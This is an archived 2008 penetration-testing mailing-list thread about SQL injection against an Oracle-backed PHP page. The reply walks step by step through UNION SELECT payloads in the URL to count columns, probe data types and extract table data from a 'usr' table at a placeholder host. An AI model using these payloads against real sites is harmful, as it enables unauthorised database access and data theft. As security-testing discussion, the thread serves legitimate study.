Penetration Testing mailing list archives

Re: Oracle URL SQL Injection issue

From: jeffrey rivero <jeffr76 () yahoo com>
Date: Fri, 18 Jan 2008 13:44:34 -0500

Hello all
in your Union start by finding out how many columns there are
ie.
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
would give you 3 columns
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
would give you 4
then once you have that
get the data types
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
for the first to be a string
and so on
then you can start to get real data from the tables
or
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--

Jeff

Clone wrote:
Hey List

I am pen testing a web app that supplies sql
parameters on the URL something like

http://x.y.z.a/item.php?Id=90

I did blind sql injection by adding AND 1=1 to confirm
the vulnerability.

Now when I do

http://x.y.z.a/item.php?Id=90&apos;

I get
ociparse() [function.ociparse]: OCIParse: ORA-01756:
quoted string not properly terminated in item.php on
line 312

Then I tried (after confirming presence of usr table
name)

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--

and I get the error

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01789: query block has incorrect number of result
columns in dbs.inc on line 44

I know one valid user account in the oracle DB.

Any idea what's the best strategy to move forward?

I'm not getting any further from here so far.

Any advise / helpo would be much appreciated.

Cheers'

      5, 50, 500, 5000 - Store N number of mails in your inbox. Go to
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads